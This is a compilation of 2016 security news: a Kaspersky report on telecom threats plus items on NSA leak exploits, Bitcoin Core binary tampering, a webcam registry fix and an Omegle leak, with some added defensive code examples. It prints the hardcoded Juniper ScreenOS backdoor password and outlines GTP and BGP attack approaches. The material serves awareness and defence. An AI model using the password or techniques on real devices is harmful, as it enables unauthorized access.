The Regin APT campaign, discovered in 2014, remains one of the most sophisticated ever seen and has the ability to infiltrate GSM networks, while the Turla group has developed the ability to hijack satellite-based Internet links as part of its Command & Control process, successfully obscuring its actual location.

Others, such as Dark Hotel and a new cyber-espionage threat actor likely to be of Chinese origin, exploit telecoms networks in their targeted campaigns. In these cases, the telecoms providers often suffer collateral damage even though they are not directly related to the attack. Further details on these can be found on Kaspersky Lab’s expert Securelist blog or through a subscription to the Kaspersky APT Threat Intelligence Reporting service.

Unaddressed software vulnerabilities

Despite all the high profile hacks and embarrassing data leaks of the last 12 months, attackers are still breaching telecoms defenses and making off with vast quantities of valuable, personal data. In many cases, attackers are exploiting new or under-protected vulnerabilities. For example, in 2015, two members of the hacker group Linker Squad gained access to Orange Spain through a company website vulnerable to a simple SQL injection, and stole 10 million items of customer and employee data.

SQL injection vulnerability on Orange Spain web site

The impact of service misconfiguration

In many cases, the hardware used by the telecommunications industry carries configuration interfaces that can be accessed openly via HTTP, SSH, FTP or telnet. This means that if the firewall is not configured correctly, the hardware in question becomes an easy target for unauthorized access.

The risk presented by publicly exposed GTP/GRX (GPRS Tunneling Protocol/GPRS Roaming Exchange) ports on devices provides a good example of this.

As CSPs encrypt the GPRS traffic between the devices and the Serving GPRS Support Node (SGSN), it is difficult to intercept and decrypt the transferred data. However, an attacker can bypass this restriction by searching on Shodan.io for devices with open GTP ports, connecting to them and then encapsulating GTP control packets into the created tunnel.

Table 1. Top 10 countries with GTP/GRX ports exposed to Internet access

#    Country                     Number of GTP/GRX ports
1    China                       52,698
2    Turkey                      8,591
3    United States of America    6,403
4    Canada                      5,807
5    Belgium                     5,129
6    Colombia                    2,939
7    Poland                      2,842
8    Morocco                     1,585
9    Jamaica                     862
10   United Arab Emirates        808
The Border Gateway Protocol (BGP) is the routing protocol used to make decisions on routing between autonomous systems. Acceptance and propagation of routing information coming from other peers can allow an attacker to implement man-in-the-middle (MITM) attacks or cause denial of service. Any route that is advertised by a neighboring BGP speaker is merged in the routing database and propagated to all the other BGP peers.

Table 2. Top five countries with BGP protocol exposed to Internet access

#    Country                     Number of devices (end of 2015)
1    Republic of Korea           16,209
2    India                       8,693
3    United States of America    8,111
4    Italy                       2,909
5    Russian Federation          2,050
An example of such an attack took place in March 2015, when Internet traffic for 167 important British Telecom customers, including a UK defense contractor that helps to deliver the country’s nuclear warhead program, was illegally diverted to servers in Ukraine before being passed along to its final destinations.

To avoid probable attacks against BGP from unauthorized remote malefactors, we recommend that companies provide network filtering, allowing only a limited number of authorized peers to connect to BGP services. To protect against malicious re-routing and hijacking initiated through authorized autonomous systems we recommend that they monitor anomalies in BGP communications (this can be done through specialized software solutions or by subscribing to alerts from vendors providing this kind of monitoring.)
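To make the recommended peer filtering and anomaly monitoring concrete, here is an added example (not from the Kaspersky report) of a small origin-AS monitor in Python: it checks a feed of observed announcements against an operator's expected prefix-to-origin table and authorized-peer list, and flags foreign origins, more-specific announcements of monitored prefixes, and sessions from unauthorized peers. The prefixes, AS numbers and the announcement feed are all constructed.

```python
"""
Added example, not part of the Kaspersky report: an origin-AS monitor that
checks observed BGP announcements against an operator's expectations and
flags the classic hijack shapes described in the text (foreign origin,
traffic-stealing more-specific, unauthorized peer). All prefixes, AS
numbers and the feed below are constructed.
"""
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class Announcement:
    prefix: str
    as_path: tuple      # leftmost = peer we learned it from, rightmost = origin AS

    @property
    def origin(self):
        return self.as_path[-1]


# Constructed: prefixes the operator legitimately originates and from which ASes
EXPECTED_ORIGINS = {
    "203.0.113.0/24": {64500},
    "198.51.100.0/22": {64500, 64501},   # anycast block originated from two ASes
}

# Constructed: the only ASes allowed to open a BGP session with us
AUTHORIZED_PEERS = {64510, 64511}


def check_peer(ann, authorized=AUTHORIZED_PEERS):
    """Session-level filtering: announcements from unknown peers are alerts."""
    peer = ann.as_path[0]
    if peer not in authorized:
        return [("unauthorized-peer", ann.prefix, peer)]
    return []


def check_announcement(ann, expected=EXPECTED_ORIGINS):
    """Route-level monitoring against the expected prefix-to-origin table."""
    net = ipaddress.ip_network(ann.prefix)
    findings = []
    # Exact match on a monitored prefix: the origin must be on the allow-list
    if ann.prefix in expected:
        if ann.origin not in expected[ann.prefix]:
            findings.append(("origin-hijack", ann.prefix, ann.origin))
        return findings
    # A more-specific of a monitored prefix wins longest-prefix match and
    # steals traffic, so it is always worth an alert; a foreign origin makes
    # it a hijack rather than a possible misconfiguration on our side.
    for known, origins in expected.items():
        known_net = ipaddress.ip_network(known)
        if net.version == known_net.version and net.subnet_of(known_net):
            kind = ("more-specific-hijack" if ann.origin not in origins
                    else "unexpected-more-specific")
            findings.append((kind, ann.prefix, ann.origin))
    return findings


def monitor(feed):
    """Run both checks over a feed of announcements and collect the alerts."""
    alerts = []
    for ann in feed:
        alerts.extend(check_peer(ann))
        alerts.extend(check_announcement(ann))
    return alerts


# Constructed feed: two legitimate routes and three anomalies
FEED = [
    Announcement("203.0.113.0/24", (64510, 64500)),      # legitimate
    Announcement("203.0.113.0/24", (64511, 64999)),      # same prefix, foreign origin
    Announcement("203.0.113.128/25", (64510, 64999)),    # more-specific from foreign AS
    Announcement("198.51.100.0/22", (64510, 64501)),     # legitimate anycast origin
    Announcement("192.0.2.0/24", (64512, 64500)),        # unauthorized peer
]

if __name__ == "__main__":
    for alert in monitor(FEED):
        print(alert)
```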

Vulnerabilities in network devices

Routers and other network devices are also primary targets for attacks against telecommunications companies.

In September 2015, FireEye researchers revealed the router malware “SYNful knock”, a combination of leaked privilege (root) credentials and a way of replacing device firmware that targets Cisco 1841, 2811 and 3825 routers (see Cisco advisory here).

Put simply, SYNful knock is a modified device firmware image with backdoor access that can replace the original operating system if the attacker has managed to obtain privileged access to the device or can physically connect to it.

SYNful is not a pure software vulnerability, but a combination of leaked privileged credentials combined with a certain way of replacing device firmware. Still, it is a dangerous way of compromising an organization’s IT infrastructure.

SYNful knock backdoor sign-in credentials request


Worldwide distribution of devices with the SYNful knock backdoor

The latest information on the number of potentially compromised devices is available through the link https://synfulscan.shadowserver.org/stats/.

A second Cisco vulnerability, CVE-2015-6389 enables attackers to access some sensitive data, such as the password file, system logs, and Cisco PCA database information, and to modify data, run internal executables and potentially make the system unstable or inaccessible. Cisco Prime Collaboration Assurance Software releases prior to 11.0 are vulnerable. Follow this Cisco bulletin for remediation actions.

For further information on Cisco fixes for its devices see https://threatpost.com/cisco-warning-of-vulnerabilities-in-routers-data-center-platforms/115609.

Juniper, another network device manufacturer, has been found to carry vulnerabilities in the operating system of its NetScreen VPN appliances, enabling third-party access to network traffic. The issue was reported by the vendor in the security advisory JSA10713 on December 18th, 2015, along with the release of the patch.

It appears that the additional code with the hardcoded password was planted in the source code in late 2013. The backdoor allows any user to log in with administrator privileges using the hardcoded password “<<< %s(un=’%s’) = %u”. This vulnerability has been identified as CVE-2015-7755 and is considered highly critical.

Top countries where ScreenOS devices are used are the Netherlands, the United States, China, Italy and Mexico.


Juniper ScreenOS-powered devices worldwide

Another Juniper backdoor, CVE-2015-7756, affects ScreenOS 6.2.0r15 through 6.2.0r18 and 6.3.0r12 through 6.3.0r20 and allows a third party to monitor traffic inside VPN connections due to security flaws in the Dual_EC PRNG algorithm for random number generation.

To protect the organization from misconfiguration and network device vulnerabilities, Kaspersky Lab recommends that companies pay close attention to vulnerabilities in the network services of telecommunication equipment, establish effective vulnerability and configuration management processes, and regularly perform security assessments, including penetration testing for different types of attackers (a remote intruder, a subscriber, a contractor, etc.).

Malicious insiders

Even if you consider your critical systems and devices protected and safe, it is difficult to fully control some attack vectors. People rank at the very top of this list. Their motivations are often hard to predict and anticipate, ranging from a desire for financial gain to disaffection, coercion and simple carelessness.

While insider-assisted attacks are uncommon, the impact of such attacks can be devastating as they provide a direct route to the most valuable information.

Examples of insider attacks in recent years include:

A rogue telecoms employee leaking 70 million prison inmate calls, many breaching client-attorney privilege.
An SMS center support engineer who had intercepted messages containing OTP (One-Time Passwords) for the two-step authentication required to log in to customer accounts at a popular fintech company. The engineer was found to be freely offering his services on a popular DarkNet forum.
For attackers, infiltrating the networks of ISPs and CSPs requires a certain level of experience – and it is often cheaper and easier to stroll across the perimeter with the help of a hired or blackmailed insider. Cybercriminals generally recruit insiders through two approaches: enticing or coercing individual employees with relevant skills, or trawling around underground message boards looking for an appropriate employee or former employee.

Employees of cellular service providers are in demand for fast track access to subscriber and company data or SIM card duplication/illegal reissuing, while staff working for Internet service providers are needed for network mapping and man-in-the-middle attacks.

A particularly promising and successful attack vector for recruiting an insider for malicious intrusion is blackmail.

Data breaches, such as the 2015 Ashley Madison leak, reveal information that attackers can compare with other publicly available information to track down where people work and compromise them accordingly. Very often, these leaked databases contain corporate email addresses, including those of telecommunication companies.

Further information on the emerging attack vectors based on the harvesting of Open Source Intelligence (OSINT) can be obtained using Kaspersky Lab’s customer-specific Intelligence Reporting services.

Threats targeting CSP/ISP subscribers


Attacks targeting the customers of cloud and Internet service providers remain a key area of interest for cybercriminals. We’ve revealed a number of malware activities and attack techniques based on internal information and incidents that were caught in our scope. As a result of analyzing this data the following main threats were identified:

Obtaining subscribers’ credentials. This is growing in appeal as consumers and businesses undertake ever more activity online and particularly on mobile. Further, security levels are often intentionally lowered on mobile devices in favor of usability, making mobile attacks even more attractive to criminals.
Compromising subscribers’ devices. The number of mobile malware infections is on the rise, as is the sophistication and functionality of the malware. Experienced and skilled programmers are now focusing much of their attention on mobile – looking to exploit payment services as well as low-valued assets like compromised Instagram or Uber accounts, collecting every piece of data from the infected devices.
Compromising small-scale telecoms cells used by consumers and businesses. Vulnerabilities in CSP-provided femtocells allow criminals to compromise the cells and even gain access to the entire cloud provider’s network.
Successful Proof-Of-Concept attacks on USIM cards. Recent research shows that the cryptography of 3G/4G USIM cards is no longer unbreakable. Successful attacks allow SIM card cloning, call spoofing and the interception of SMS.
Social engineering, phishing and other ways in

Social engineering and phishing remain popular activities and they continue to evolve and improve, targeting unaware or poorly aware subscribers and telecoms employees.

The attackers exploit trust and naivety. In 2015, the TeamHans hacker group penetrated one of Canada’s biggest communications groups, Rogers, simply by repeatedly contacting IT support and impersonating mid-ranking employees, in order to build up enough personal information to gain access to the employee’s desktop. The attack provided hackers with access to contracts with corporate customers, sensitive corporate e-mails, corporate employee IDs, documents, and more.

Both social engineering and phishing approaches are worryingly successful. The Data Breach Investigations Report 2016 found that 30% of phishing emails were opened, and that 12% clicked on the malicious attachment – with the entire process taking, on average, just 1 minute and 40 seconds.

Social engineers and phishers also use multiple ways to make their attacks look more authentic, enriching their data with leaked profiles, or successfully impersonating employees or contractors. Recently criminals have successfully stolen tens of thousands of euros from dozens of people across Germany after finding a way around systems that text a code to online banking users to confirm transactions. After infecting their victims with banking malware and obtaining their phone numbers, they called the CSP’s support and, impersonating a retail shop, asked for a new SIM card to be activated, thus gaining access to the OTPs (One-Time Passwords) or “mTANs” used for two-factor authentication in online banking.

Kaspersky Lab recommends that telecommunications providers implement notification services for financial organizations that alert them when a subscriber’s SIM card has been changed or when personal data is modified.

Some CSPs have also implemented a threat exchange service to inform financial industry members when a subscriber’s phone is likely to have been infected with malware.

Vulnerable kit

USBs, modems and portable Wi-Fi routers remain high-risk assets for subscribers, and we continue to discover multiple vulnerabilities in their firmware and user interfaces. These include:

Vulnerabilities in web interfaces designed to help consumers configure their devices. These can be modified to trick a user into visiting a specially crafted page.
Vulnerabilities that result from insufficient authentication. These can allow for the modification of device settings (like DNS server addresses), and the interception, sending and receiving of SMS messages, or USSD requests, by exploiting different XSS and CSRF vulnerabilities.
RCE (Remote Code Execution) vulnerabilities based on different variants of embedded Linux that can enable firmware modification and even a complete remote compromise.

Built-in “service” backdoor allowing no-authentication access to device settings

Examples of these kinds of vulnerabilities were demonstrated in research by Timur Yunusov from the SCADAStrangeLove team. The author assessed a number of 3G/4G routers from ZTE, Huawei, Gemtek and Quanta. He has reported a number of serious vulnerabilities:

Remote Code Execution from web scripts.
Arbitrary device firmware modification due to insufficient consistency checks.
Cross Site Request Forgery and Cross Site Scripting attacks.
All these vectors can be used by an external attacker for the following scenarios:

Infecting a subscriber’s computer via PowerShell code or badUSB attack.
Traffic modification and interception.
Subscriber account access and device settings modification.
Revealing subscriber location.
Using device firmware modification for APT attack persistence.
Most of these issues exist due to web interface vulnerabilities (like insufficient input validation or CSRF) or modifications made by the vendor during the process of branding its devices for a specific telecommunications company.

The risk of local cells

Femtocells, which are essentially a personal NodeB with an IP network connection, are growing in popularity as an easy way to improve signal coverage inside buildings. Small business customers often receive them from their CSPs. However, unlike core systems, they are not always submitted to suitably thorough security audits.


Femtocell connection map

Over the last year, our researchers have found a number of serious vulnerabilities in such devices that could allow an attacker to gain complete control over them. Compromising a femtocell can lead to call interception, service abuse and even illegal access to the CSP’s internal network.

At the moment, a successful attack on a femtocell requires a certain level of engineering experience, so risks remain low – but this is likely to change in the future.

USIM card vulnerabilities

Research presented at BlackHat USA in 2015 revealed successful attacks on USIM card security. USIMs had previously been considered unbreakable thanks to the AES-based MILENAGE algorithm used for authentication. The researchers conducted differential power analysis for encryption key and secret extraction, which allowed them to clone the new generation of 3G/4G SIM cards from different manufacturers.


Right byte guess peak on differential power analysis graph


Telecommunications is a critical infrastructure and needs to be protected accordingly. The threat landscape shows that vulnerabilities exist on many levels: hardware, software and human, and that attacks can come from many directions. Telecoms providers need to start regarding security as a process – one that encompasses threat prediction, prevention, detection, response and investigation.

A comprehensive, multi-layered security solution is a key component of this, but it is not enough on its own. It needs to be complemented by collaboration, employee education and shared intelligence. Many telecommunications companies already have agreements in place to share network capability and capacity in the case of disruption, and now is the time to start reaping the benefit of shared intelligence.

Our Threat Intelligence Reporting services can provide customer-specific insight into the threats facing your organization. If you’ve ever wondered what your business looks like to an attacker, now’s the time to find out.

Does your WebCam Crash after Windows 10 Anniversary Update? Here’s How to Fix It
21.8.2016 thehackernews IT
If your webcam has stopped working after installing recently-released Microsoft's big Anniversary Update for Windows 10, you are not alone.
Along with significant changes to improve the Windows experience, the Windows 10 Anniversary Update changes the way webcams are supported, which has rendered a number of different webcams inoperable, causing serious issues not only for consumers but also for the enterprise.
The problem is that Microsoft added a new way for applications to access webcams, Microsoft's new Windows Camera Frame Server, which prevents webcams from using two particular compression formats, H.264 and MJPEG.
Microsoft decided that the Camera Frame Server should only receive an uncompressed YUY2 encoded stream from the webcam, which is affecting far more devices than Microsoft expected, causing millions of cameras to crash.
This is the reason why your camera hangs, freezes, or simply does not work when you try to make a video call to a friend over Skype. Brad Sams of Thurrott first discovered this issue.
"Since it will take some extra time for the H.264 work to go through this additional layer of testing, and we would prefer not to delay the MJPEG changes [fix], we will ship these two separately. You can expect the MJPEG media type work to reach you first," reads a post in Microsoft's Support Forum from Windows Camera Team member Mike M.
Although Microsoft has planned to fix the issue and roll out an official fix in September, Windows users who do not want to wait for a month for Microsoft's update can use a workaround suggested by Rafael Rivera to re-enable the old behavior of webcam and fix the issue.
Here's how to Fix Your Webcam:
The workaround is a registry hack, so if you are comfortable tweaking the registry, make the below changes. The hack is pretty simple; you just need to stick to the following instructions.
Go to the Start Menu, type "regedit" and press Enter. This opens 'The Registry Editor'.
Navigate to "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Foundation\Platform" in the left sidebar.
Right-click the "Platform" key and select New → DWORD (32-bit) Value.
Name this value "EnableFrameServerMode" and set the value to "0" by double clicking on it.
These are the steps if you are using a 32-bit version of Windows 10.
If you are using a 64-bit version of Windows 10, you will need to navigate to "HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Media Foundation\Platform" in the left sidebar and follow steps 3 and 4 mentioned above.
Now close the registry editor and just re-launch the application in which your webcam was freezing. They should now work normally – no reboot, no sign out required.
When Microsoft actually fixes the issue after a month, just revisit the same location in the registry editor and delete the "EnableFrameServerMode" value you added to undo this change.
The hack is simple but follow the above steps correctly because a small mistake in The Registry Editor tool can render your system unstable or even inoperable.
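The registry steps above as a script, added here as an example; it is not code from the article or from Rafael Rivera's workaround. It assumes an elevated PowerShell prompt and, on 64-bit Windows, sets both the native key and the WOW6432Node key the article names (setting both is this example's choice, so that 32-bit and 64-bit applications see the same value). Run it with -Undo to delete the value again once Microsoft's fix has shipped.

```powershell
# Added example, not code from the article. Applies the EnableFrameServerMode
# workaround described above, or removes it again with -Undo once Microsoft's
# fix has shipped. Requires an elevated (Run as administrator) PowerShell.
param([switch]$Undo)

$valueName = 'EnableFrameServerMode'
$native    = 'HKLM:\SOFTWARE\Microsoft\Windows Media Foundation\Platform'
$wow6432   = 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows Media Foundation\Platform'

# Writing under HKLM needs administrator rights; fail early with a clear message.
$identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
$principal = New-Object Security.Principal.WindowsPrincipal($identity)
if (-not $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
    throw 'Run this script from an elevated PowerShell prompt.'
}

# 32-bit Windows: only the native key exists. 64-bit Windows: the article points at the
# WOW6432Node key (read by 32-bit applications); the native key is set as well so that
# 64-bit applications get the same behaviour. Setting both is an assumption of this example.
$targets = @($native)
if ([Environment]::Is64BitOperatingSystem) { $targets += $wow6432 }

foreach ($key in $targets) {
    if (-not (Test-Path $key)) {
        Write-Warning "Key not found, skipping: $key"
        continue
    }
    $current = Get-ItemProperty -Path $key -Name $valueName -ErrorAction SilentlyContinue
    if ($Undo) {
        if ($null -ne $current) {
            Remove-ItemProperty -Path $key -Name $valueName
            Write-Host "Removed $valueName from $key"
        } else {
            Write-Host "$valueName not present under $key, nothing to undo"
        }
    } else {
        # REG_DWORD 0 disables the new Frame Server path, restoring the pre-update behaviour.
        New-ItemProperty -Path $key -Name $valueName -PropertyType DWord -Value 0 -Force | Out-Null
        Write-Host "Set $key\$valueName = 0"
    }
}

Write-Host 'Done. Restart the application that uses the webcam; no reboot is needed.'
```

Save it as a .ps1 file and run it from an elevated prompt; the script only touches the one value the article describes, so the rest of the Platform key is left exactly as it was.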

Bitcoins move from the seized SilkRoad wallet to the ShadowBrokers
21.8.2016 securityaffairs Security

A security expert noticed strange transactions from the Bitcoin wallet of the SilkRoad (now in the hands of Feds) to the ShadowBrokers ‘ wallet.
I was surfing the Internet searching for interesting data about the ShadowBrokers group that leaked exploits and hacking tools belonging to the NSA Equation Group.

I have found a very intriguing analysis of the popular security researcher krypt3ia that has analyzed the Bitcoin transactions linked to the #ShadowBrokers account. It seems that the account is receiving small amounts of money (at about $990.00 a couple of days ago), but the real surprise is that some of the payments are coming from the seized Silk Road bitcoins and account. 

Bitcoin The ShadowBroker account

Hey, wait a moment, the Silk Road Bitcoin are under the control of the FBI after the seizure of the popular black market.

krypt3ia decided to investigate the overall transactions and discovered that the US Marshals Service was also involved in the transfers.

“So, is this to say that these coins are still in the coffers of the feds and they are being sent to ShadowBrokers to chum the water here? Maybe get a conversation going? Maybe to get the bitcoins flying so others can trace some taint? Of course once you start to look at that address and the coins in and out there you get some other interesting hits. Suddenly you are seeing US Marshall service as well being in that loop. Which makes sense after the whole thing went down with the theft of coins and such by rogue agents of the USSS and DEA.” wrote krypt3ia in a blog post.

Analyzing the transactions, the expert noticed payments of 0.001337 BTC to ShadowBrokers.

Bitcoin The ShadowBroker account 2

We are aware that Silk Road coins are in the hands of the US GOV, but someone is sending ShadowBrokers fractions of them.

“What if, and you can see this once you start to dig around with Maltego, the coins being paid to the account so far also come from other accounts that are, shall we call them cutout accounts for the government?” added the expert.

At this point, the researcher invited readers to analyze transactions involving all the accounts that passed money to Bitcoin Wallets used by the Government and that were used to transfer money to the ShadowBrokers.

At the time I’m writing, the ShadowBroker wallet was involved in 41 transactions for a total of 1.738 BTC, and the highest bid is 1.5 bitcoin, or around $850.

NSA BENIGNCERTAIN tool can obtain VPN Passwords from CISCO PIX
21.8.2016 securityaffairs Safety

Researchers tested the BENIGNCERTAIN tool included in the NSA data dump that allows attackers to extract VPN passwords from certain Cisco devices.
Following the disclosure of the NSA dump, IT vendors Cisco and Fortinet issued security patches to fix the flaws exploited by the Equation Group in their products.


Now, security researchers have uncovered another exploit included in the leaked dump, dubbed BENIGNCERTAIN that allows the extraction of VPN passwords from certain Cisco devices.

The expert Mustafa Al-Bassam who analyzed the data dump has called the attack “PixPocket” after the name of the Cisco products hacked by the tool, the Cisco PIX.

The CISCO PIX product family was declared phase out back in 2009, but it is widely adopted by government entities and enterprises.

According to the expert, the tool works against the CISCO PIX versions 5.2(9) up to 6.3(4).

Al-Bassam discovered that the tool could be used to send a packet to the target machine that makes it dump a portion of the memory that includes the VPN’s authentication password.

The security expert Brian Waters also tested the BENIGNCERTAIN exploits confirming that it works.

Brian H₂O (@int10h) tweeted on 19 Aug 2016 at 07:49: “I can confirm that BENIGNCERTAIN works against real hardware @XORcat @GossiTheDog @musalbas @marcan42 @msuiche”
“it’s a PIX 501 running 6.3(5)145; and I used v1110 of the exploit,” added Waters in a second Tweet, which means that BENIGNCERTAIN could also work against other versions of the PIX.

This means that NSA could have remotely sent a packet to a target VPN to obtain its preshared key and decrypt the traffic.

Cisco published the blog post titled “The Shadow Brokers EPICBANANAS and EXTRABACON Exploits” to provide further details about its investigation of the tools included in the arsenal of the Equation Group leaked online.

The Cisco security team is still investigating the content of the leaked data dump to verify whether other hacking tools could be exploited against its products.

“On August 19th, articles were released regarding the BENIGNCERTAIN exploit potentially being used to exploit legacy Cisco PIX firewalls. Our investigation so far has not identified any new vulnerabilities in current products related to the exploit. Even though the Cisco PIX is not supported and has not been supported since 2009 (see EOL / EOS notices), out of concern for customers who are still using PIX we have investigated this issue and found PIX versions 6.x and prior are affected. PIX versions 7.0 and later are confirmed to be unaffected by BENIGNCERTAIN. The Cisco ASA is not vulnerable.” wrote CISCO.

Is security enabling or compromising productivity?

20.8.2016 netsecurity Hacking

While most organizations fundamentally believe connecting people to the best technology is vital to business productivity, many struggle to achieve agility due to traditional on-premise security mindsets, according to an Okta survey of 300 IT and security professionals.

Failing to adapt and upgrade security tools is putting organizations at risk. 65% of respondents think that a data breach will happen within the next 12 months if they do not upgrade legacy security solutions in time.

“In order to be more productive, organizations worldwide are investing in cloud and mobile technologies, enabling their staff to work from virtually anywhere. But this isn’t enough to ensure true agility. As organizations become increasingly connected, the traditional idea of the enterprise network boundary is vanishing and businesses need to prioritise strong security,” said David Baker, CSO at Okta. “To successfully navigate the new perimeter and avoid compromising on security and productivity, IT leaders need to adopt tools that span traditional company and network boundaries and enable agility across the organization.”

Organizations are unsure if security is enabling or compromising productivity and agility

When asked if security measures compromised or enabled productivity in their organization, respondents’ opinions were mixed. Just over half (52%) said that their current security solutions compromise productivity, while 48% believe their security measures enable the organization to adopt best of breed solutions that enable productivity and agility.

Visibility into application usage is limited

Okta’s research shows that 85% of IT leaders suffer from a lack of insight over who has access to applications within their organization. Even more worrying, 80% of respondents pointed to weak passwords or weak access controls as a security issue.

Investing in new mobile, automation, and cloud technologies is paying dividends for organizations

92% of respondents believe their organization could do more to integrate and support cloud applications into their infrastructure and systems. This reveals a massive opportunity for IT teams to further drive agility and productivity, and the chance to drive this percentage down.

Warning — Bitcoin Users Could Be Targeted by State-Sponsored Hackers
20.8.2016 thehackernews Hacking
Another day, more bad news for Bitcoin users.
A leading Bitcoin information site is warning users that an upcoming version of the Blockchain consolidation software and Bitcoin wallets could most likely be targeted by "state-sponsored attackers."
Recently, one of the world's most popular cryptocurrency exchanges, Bitfinex, suffered a major hack that resulted in a loss of around $72 Million worth of Bitcoins.
Now, Bitcoin.org, the website that hosts downloads for Bitcoin Core, posted a message on its website on Wednesday warning users that the next version of the Bitcoin Core wallet, one of the most popular bitcoin wallets used to store bitcoins, might be replaced with a malicious version of the software offered by government-backed hackers.
Specifically, Chinese bitcoin users and services are encouraged to be vigilant "due to the origin of the attackers."
Bitcoin.org doesn't believe it has sufficient resources to defend against the attack. However, the website did not reveal the name of the country planning the attack.
The Warning Message from the Bitcoin.org site reads:
"Bitcoin.org has reason to suspect that the binaries for the upcoming Bitcoin Core release will likely be targeted by state-sponsored attackers. As a website, Bitcoin.org does not have the necessary technical resources to guarantee that we can defend ourselves from attackers of this calibre. We ask the Bitcoin community, and in particular the Chinese Bitcoin community to be extra vigilant when downloading binaries from our website."
"In such a situation, not being careful before you download [the software] could cause you to lose all your coins. This malicious software might also cause your computer to participate in attacks against the Bitcoin network."
Also Read: Bitcoin Exchange Offers $3.5 Million Reward for Information of Stolen Bitcoins.
In such cases, it is likely that hackers will try to hijack and replace the official binary files used to run Bitcoin software on mining pools, either:
By compromising the Bitcoin.org official site
By conducting a man-in-the-middle attack to fake a cryptographic certificate that would allow hackers to intercept victim’s encrypted HTTPS connection and replace the legitimate download with a malicious one, tricking users into installing a malicious version of the Bitcoin software.
However, Bitcoin Core developer Eric Lombrozo told The Reg that "there's absolutely nothing in the Bitcoin Core binaries, as built by the Bitcoin Core team, that has been targeted by state-sponsored attackers that we know of at this point."
"Perhaps certain sites where people download the binaries could end up getting compromised, but let's not unnecessarily spread paranoia about the Bitcoin Core binaries themselves."
Verify Signatures and Hashes
As a countermeasure, users are advised to securely verify the signature and hashes of the Bitcoin Core binaries, which are cryptographically signed with a key, before running them, to ensure the binaries are legitimate and were created by the Core developers team.
"We strongly recommend that you download that key, which should have a fingerprint of 01EA5486DE18A882D4C2684590C8019E36C2E964. You should securely verify the signature and hashes before running any Bitcoin Core binaries," the advisory states.
Moreover, you are advised to download the binaries from the official Bitcoin site only; otherwise, you may end up getting compromised.
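The verification the advisory asks for, written out as a script. This is an added example, not code from the article or from Bitcoin.org; it assumes gpg is installed and on the PATH, that the signing key has already been imported into the keyring, and that the release ships a clearsigned checksum file named SHA256SUMS.asc (the file name is an assumption; the only value taken from the page is the key fingerprint quoted in the advisory).

```powershell
# Added example, not code from the article or from the Bitcoin Core project.
# Checks a downloaded release the way the advisory describes: confirm the signing key's
# fingerprint, verify the GPG signature on the checksum file, then compare the binary's
# SHA-256 hash against the signed list. File names below are assumptions.
param(
    [Parameter(Mandatory)] [string]$BinaryPath,         # e.g. the downloaded installer
    [string]$SumsFile = 'SHA256SUMS.asc',                # assumed clearsigned checksum file
    [string]$ExpectedFingerprint = '01EA5486DE18A882D4C2684590C8019E36C2E964'  # from the advisory
)

function Test-SigningKey {
    # The key must be present and its fingerprint must match the one published out of band,
    # so a substitute key served by a compromised download site would not pass.
    $out  = & gpg --batch --with-colons --fingerprint $ExpectedFingerprint 2>$null
    $fprs = $out | Where-Object { $_ -like 'fpr:*' } | ForEach-Object { ($_ -split ':')[9] }
    return ($fprs -contains $ExpectedFingerprint)
}

function Test-ChecksumSignature {
    # --status-fd 1 makes gpg print machine-readable lines; VALIDSIG carries the fingerprint
    # of the (sub)key that made the signature and, as its last field, the primary key.
    $status = & gpg --batch --status-fd 1 --verify $SumsFile 2>$null
    if ($LASTEXITCODE -ne 0) { return $false }
    foreach ($line in $status) {
        if ($line.StartsWith('[GNUPG:] VALIDSIG ')) {
            $f = $line -split ' '
            if ($f[2] -eq $ExpectedFingerprint -or $f[-1] -eq $ExpectedFingerprint) { return $true }
        }
    }
    return $false   # no signature, a bad one, or one made by some other key
}

function Get-PublishedHash {
    # The clearsigned file holds "<sha256>  <filename>" lines between the PGP headers.
    $name = Split-Path -Leaf $BinaryPath
    foreach ($line in Get-Content $SumsFile) {
        if ($line -match '^([0-9a-fA-F]{64})\s+\*?(.+)$' -and $matches[2].Trim() -eq $name) {
            return $matches[1].ToLower()
        }
    }
    return $null
}

if (-not (Test-SigningKey)) {
    throw "Key $ExpectedFingerprint is not in the keyring; import it and re-check the fingerprint."
}
if (-not (Test-ChecksumSignature)) {
    throw "Signature on $SumsFile is missing, invalid, or not made by the expected key."
}
$published = Get-PublishedHash
if (-not $published) { throw "No entry for $(Split-Path -Leaf $BinaryPath) in $SumsFile." }
$actual = (Get-FileHash -Algorithm SHA256 -Path $BinaryPath).Hash.ToLower()
if ($actual -ne $published) {
    throw "Hash mismatch: got $actual, expected $published. Do not run this binary."
}
Write-Host "OK: $BinaryPath matches the signed checksum list."
```

The order matters: gpg reports a signature as valid for any key in the keyring, so the fingerprint comparison is what ties the checksum list to the developers' key rather than to whatever key a tampered download page might offer, and only then is the hash of the binary worth comparing.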

Omegle, the Popular 'Chat with Strangers' Service Leaks Your Dirty Chats and Personal Info
20.8.2016 thehackernews Security
Ever since the creation of online chat rooms and then social networking, people have changed the way they interact with their friends and associates.
However, when it comes to anonymous chatting services, you don't even know what kinds of individuals you are dealing with.
Sharing identifiable information about yourself with them could put you at risk of becoming a victim of stalking, harassment, identity theft, webcam blackmail, and even phishing scams.
Have you heard of Omegle? The popular, free online anonymous chat service that allows you to chat with random strangers, without any registration. The service randomly pairs you in one-on-one chat window where you can chat anonymously over text or webcam.
But, are your chats actually Anonymous?
No, all your chats are recorded and saved by the service. So, if you have shared your personal details, such as your name, phone number, or email address, with anyone over the service, you are no longer anonymous.
Even the website describes its service as, "When you use Omegle, we pick someone else at random and let you talk one-on-one. To help you stay safe, chats are anonymous unless you tell someone who you are (not suggested!), and you can stop a chat at any time."
And here comes the worst part:
The recorded online conversations are saved in such a way that anyone with a little knowledge of hacking can pilfer them, revealing your personal information along with those dirty chats that could be used to harass or blackmail you.
Indrajeet Bhuyan (@Indrajeet_b), a young Indian bug hunter, has shown The Hacker News how Omegle is saving screenshots of every 'so-called' anonymous chat session at a specific location on its web server, from which they could be downloaded by anyone with a little knowledge of website structure.
Bhuyan wrote a simple python script, Omegle-Chat-Hack, that automatically downloads the saved screenshots from the website.
As a proof-of-concept, he also published some of those screenshots, showing how easily people, especially teenagers, share their personal details and contact info with strangers on a service, where they are supposed to stay anonymous.
